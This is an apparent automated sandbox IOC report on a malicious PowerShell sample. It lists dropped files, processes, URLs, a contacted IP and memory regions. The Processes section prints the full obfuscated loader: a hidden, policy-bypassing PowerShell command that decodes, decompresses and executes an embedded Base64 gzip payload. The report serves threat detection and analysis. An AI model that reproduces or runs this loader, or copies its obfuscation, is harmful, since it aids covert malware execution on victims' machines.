IOC Report
x6bjOrKFQn.ps1

loading gif

Files

File Path
Type
Category
Malicious
x6bjOrKFQn.ps1
ASCII text, with very long lines (26529)
initial sample
malicious
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RES45B2.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Sat Oct 26 13:16:49 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4eysaxf.3ft.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fknazxxb.my5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4u1nkdm.gc2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zeryh4z0.0ra.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.0.cs
Unicode text, UTF-8 (with BOM) text
dropped
C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.out
Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36U39KFQJEE78T6R9Y9Q.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF594778.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NPJMGXIC699F92ASQKVD.temp
data
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://oneget.orgX
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://oneget.org
unknown
There are 4 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
206.41.208.89
unknown
United States

Memdumps

Base Address
Regiontype
Protect
Malicious
7FFD9BBE0000
trusted library allocation
page read and write
1FDE6110000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
1E25F320000
trusted library allocation
page read and write
7FFD9B9A4000
trusted library allocation
page read and write
9397237000
stack
page read and write
2159E320000
heap
page read and write
2159E2E2000
heap
page read and write
15DA21A0000
heap
page read and write
2159E302000
heap
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
2159FC10000
heap
page read and write
1E25C030000
heap
page read and write
1E276209000
heap
page read and write
2159E280000
heap
page read and write
1E27617E000
heap
page read and write
1E25D850000
heap
page readonly
1FDFE8FB000
heap
page read and write
1E26DF8F000
trusted library allocation
page read and write
2159E560000
heap
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
7FFD9BB92000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
9397179000
stack
page read and write
2159E315000
heap
page read and write
1FDFE717000
heap
page read and write
2159E2C1000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
2159E2B1000
heap
page read and write
7FFD9BDD0000
trusted library allocation
page read and write
5F5413A000
stack
page read and write
1E25BD78000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
1E25D8C0000
heap
page read and write
5F543BB000
stack
page read and write
1E276057000
heap
page execute and read and write
1FDE4624000
heap
page read and write
1E275DB0000
heap
page read and write
7FFD9B9B3000
trusted library allocation
page execute and read and write
5F54D8F000
stack
page read and write
7FFD9BD20000
trusted library allocation
page read and write
1E25BE36000
heap
page read and write
2159E2A4000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
2159E2BA000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
7FFD9BC20000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1FDE5FD0000
heap
page read and write
5F5423E000
stack
page read and write
1E276206000
heap
page read and write
1E25F43E000
trusted library allocation
page read and write
1FDE44C0000
heap
page read and write
7FFD9BD10000
trusted library allocation
page read and write
215A1050000
direct allocation
page read and write
5F5433E000
stack
page read and write
2159FBC7000
direct allocation
page read and write
1FDE6630000
heap
page execute and read and write
2159E2C3000
heap
page read and write
1E25BE05000
heap
page read and write
1FDE4665000
heap
page read and write
215A0FD0000
direct allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
1FDFE705000
heap
page read and write
1FDE4592000
heap
page read and write
2159E32E000
heap
page read and write
2159E2BB000
heap
page read and write
1E25D770000
heap
page read and write
7FFD9BD40000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
7FFD9B9FC000
trusted library allocation
page execute and read and write
15DA2280000
heap
page read and write
2159E2C3000
heap
page read and write
1FDF68C1000
trusted library allocation
page read and write
1E25D860000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
2159E2D6000
heap
page read and write
93973BE000
stack
page read and write
1E2761D9000
heap
page read and write
2159FBE0000
direct allocation
page read and write
215A1070000
direct allocation
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
9396AD5000
stack
page read and write
26AF8FC000
stack
page read and write
1FDE66CB000
trusted library allocation
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
7FFD9BDA0000
trusted library allocation
page read and write
5F53F78000
stack
page read and write
1E25DC82000
heap
page read and write
9397339000
stack
page read and write
1E2761D1000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
1FDFE8C0000
heap
page read and write
2159E315000
heap
page read and write
2159E2AA000
heap
page read and write
1FDE8672000
trusted library allocation
page read and write
1E25D776000
heap
page read and write
2159E2B3000
heap
page read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
7FFD9BCA0000
trusted library allocation
page read and write
1FDE875F000
trusted library allocation
page read and write
1FDF67C1000
trusted library allocation
page read and write
1FDE87BB000
trusted library allocation
page read and write
1FDF6641000
trusted library allocation
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
1E25F26C000
trusted library allocation
page read and write
1E25BE27000
heap
page read and write
5F53CFE000
stack
page read and write
5F53E7E000
stack
page read and write
1E25EBE9000
trusted library allocation
page read and write
1FDE5FA0000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
2159E2BB000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
215A1010000
direct allocation
page read and write
9396F7D000
stack
page read and write
1E275DD5000
heap
page read and write
2159E2CA000
heap
page read and write
2159E2B3000
heap
page read and write
1FDE4626000
heap
page read and write
2159E325000
heap
page read and write
1FDE60C0000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
1E25D760000
trusted library allocation
page read and write
93974BF000
stack
page read and write
2159E2BC000
heap
page read and write
2159E2BB000
heap
page read and write
1FDE6872000
trusted library allocation
page read and write
1FDFE90D000
heap
page read and write
1E2761E7000
heap
page read and write
7FFD9BB42000
trusted library allocation
page read and write
5F53DFE000
stack
page read and write
1FDE8B06000
trusted library allocation
page read and write
1FDF666A000
trusted library allocation
page read and write
215A0FF0000
direct allocation
page read and write
1FDE646C000
heap
page read and write
7DF4D38E0000
trusted library allocation
page execute and read and write
215A10A1000
direct allocation
page read and write
1FDE5F90000
heap
page readonly
7FFD9B9B7000
trusted library allocation
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1FDE5F80000
trusted library allocation
page read and write
1FDFE8B0000
heap
page execute and read and write
1E25BC60000
heap
page read and write
1E25BE02000
heap
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
1E25DE39000
trusted library allocation
page read and write
2159E2C2000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
1FDE6641000
trusted library allocation
page read and write
1FDE5F50000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
9396B5D000
stack
page read and write
2159E320000
heap
page read and write
1FDE5FD5000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
2159E2CA000
heap
page read and write
939753C000
stack
page read and write
7FFD9BC80000
trusted library allocation
page read and write
1E25DFD9000
trusted library allocation
page read and write
15DA22D0000
heap
page read and write
7FFD9BA5C000
trusted library allocation
page execute and read and write
1E2761A6000
heap
page read and write
1E25FE3E000
trusted library allocation
page read and write
1FDE461B000
heap
page read and write
1E25BE48000
heap
page read and write
1FDFE8DC000
heap
page read and write
1FDE8B02000
trusted library allocation
page read and write
2159FC20000
heap
page read and write
1E26DF92000
trusted library allocation
page read and write
1FDFE70F000
heap
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
7FFD9BB51000
trusted library allocation
page read and write
5F54036000
stack
page read and write
2159E32F000
heap
page read and write
1E25BE4C000
heap
page read and write
1E25BE0F000
heap
page read and write
215A10C0000
direct allocation
page read and write
1E25D77A000
heap
page read and write
2159FBDD000
direct allocation
page read and write
1FDF6715000
trusted library allocation
page read and write
7FFD9B9BB000
trusted library allocation
page read and write
1FDE4588000
heap
page read and write
1FDFE760000
heap
page read and write
7FFD9BA86000
trusted library allocation
page execute and read and write
1E25E16E000
trusted library allocation
page read and write
1E25DC40000
trusted library allocation
page read and write
1FDFE671000
heap
page read and write
939743E000
stack
page read and write
1FDFE686000
heap
page read and write
1FDE60E0000
heap
page execute and read and write
2159E312000
heap
page read and write
7FFD9BC80000
trusted library allocation
page read and write
2159E32C000
heap
page read and write
5F541BE000
stack
page read and write
7FFD9BB80000
trusted library allocation
page execute and read and write
7FFD9BB94000
trusted library allocation
page read and write
1E275F70000
heap
page execute and read and write
26AFAFE000
stack
page read and write
1FDE7C72000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1FDE6010000
trusted library allocation
page read and write
939707F000
stack
page read and write
2159E2B3000
heap
page read and write
2159E2C3000
heap
page read and write
1E25C060000
heap
page read and write
2159E230000
heap
page read and write
15DA22D4000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9BB61000
trusted library allocation
page read and write
1E25F15A000
trusted library allocation
page read and write
7FFD9B9A2000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
1FDFE683000
heap
page read and write
93971BE000
stack
page read and write
5F538D5000
stack
page read and write
2159E317000
heap
page read and write
9396E7E000
stack
page read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
2159E315000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
2159E2CA000
heap
page read and write
1E25BE70000
heap
page read and write
1FDE4530000
heap
page read and write
2159E30D000
heap
page read and write
7FFD9BC20000
trusted library allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
2159E298000
heap
page read and write
1E26E0B2000
trusted library allocation
page read and write
A0B65FE000
stack
page read and write
7FFD9BC90000
trusted library allocation
page read and write
1E25BD70000
heap
page read and write
1E25D8A0000
heap
page read and write
1E275E9B000
heap
page read and write
2159E2C7000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
2159FB80000
direct allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
2159E2C5000
heap
page read and write
15DA2349000
heap
page read and write
2159E317000
heap
page read and write
1FDFE8B7000
heap
page execute and read and write
1E275DF9000
heap
page read and write
1E25BE2E000
heap
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
1E276050000
heap
page execute and read and write
1FDFE703000
heap
page read and write
5F539DE000
stack
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
215A10B0000
direct allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
7FFD9BD00000
trusted library allocation
page read and write
1FDE6610000
trusted library section
page read and write
1E276160000
heap
page read and write
2159E2D1000
heap
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
A0B67FE000
stack
page read and write
7FFD9BC70000
trusted library allocation
page read and write
1FDE8A3C000
trusted library allocation
page read and write
1FDFE640000
heap
page read and write
7FFD9BB82000
trusted library allocation
page read and write
1E25BE00000
heap
page read and write
1E25F435000
trusted library allocation
page read and write
2159FBC3000
direct allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
1E25E1E9000
trusted library allocation
page read and write
93972B8000
stack
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
1FDE4555000
heap
page read and write
2159E2BE000
heap
page read and write
26AF9FF000
stack
page read and write
1E25DDB1000
trusted library allocation
page read and write
1E25DDA0000
heap
page execute and read and write
1FDF6650000
trusted library allocation
page read and write
5F5395E000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
1E25DC10000
trusted library allocation
page read and write
1FDE4667000
heap
page read and write
1E2761CE000
heap
page read and write
2159E2AE000
heap
page read and write
7FFD9BDC0000
trusted library allocation
page read and write
1FDE6620000
direct allocation
page execute and read and write
215A10A3000
direct allocation
page read and write
1FDE7272000
trusted library allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
5F53EFC000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1E26E0AE000
trusted library allocation
page read and write
7FFD9B9B2000
trusted library allocation
page read and write
9396EFE000
stack
page read and write
7FFD9BDB0000
trusted library allocation
page read and write
5F540B9000
stack
page read and write
1E26E09F000
trusted library allocation
page read and write
7FFD9BB6A000
trusted library allocation
page read and write
2159E2B3000
heap
page read and write
1FDE8734000
trusted library allocation
page read and write
7FFD9BD60000
trusted library allocation
page execute and read and write
7FFD9B9B4000
trusted library allocation
page read and write
9396FFB000
stack
page read and write
1FDF66B5000
trusted library allocation
page read and write
5F53D7B000
stack
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
215A10C0000
direct allocation
page read and write
1E25D774000
heap
page read and write
1E26DE25000
trusted library allocation
page read and write
1FDFE67B000
heap
page read and write
2159E2CA000
heap
page read and write
93970FD000
stack
page read and write
9397F0E000
stack
page read and write
1FDE466B000
heap
page read and write
2159E2BB000
heap
page read and write
1E275E41000
heap
page read and write
2159E2F9000
heap
page read and write
7FFD9BC30000
trusted library allocation
page read and write
2159FBE0000
direct allocation
page read and write
1E25BE30000
heap
page read and write
1E25D840000
trusted library allocation
page read and write
1FDFE72A000
heap
page read and write
2159E2CA000
heap
page read and write
2159E150000
heap
page read and write
1E25BDC2000
heap
page read and write
2159FC14000
heap
page read and write
5F53C7D000
stack
page read and write
7FFD9B9A3000
trusted library allocation
page execute and read and write
1FDFE6C1000
heap
page read and write
2159E250000
heap
page read and write
215A1030000
direct allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1FDE44F0000
heap
page read and write
5F53FBE000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1FDE4580000
heap
page read and write
15DA2340000
heap
page read and write
2159E564000
heap
page read and write
2159E2E2000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
1FDE5FE1000
trusted library allocation
page read and write
2159E2CA000
heap
page read and write
2159E2F2000
heap
page read and write
1FDE4550000
heap
page read and write
2159FBDB000
direct allocation
page read and write
1E276083000
heap
page read and write
7FFD9B9CB000
trusted library allocation
page read and write
1E25C064000
heap
page read and write
9396BDE000
stack
page read and write
1FDE463C000
heap
page read and write
2159E32F000
heap
page read and write
1E25BD40000
heap
page read and write
7FFD9BA56000
trusted library allocation
page read and write
1E276080000
heap
page read and write
15DA22A0000
heap
page read and write
A0B63F7000
stack
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
2159FBC0000
direct allocation
page read and write
1E25E16C000
trusted library allocation
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
215A1090000
direct allocation
page read and write
1E26DDB1000
trusted library allocation
page read and write
7FFD9BA66000
trusted library allocation
page read and write
1FDE4620000
heap
page read and write
7FFD9BB5A000
trusted library allocation
page read and write
1E26DDC0000
trusted library allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1FDE44D0000
heap
page read and write
There are 358 hidden memdumps, click here to show them.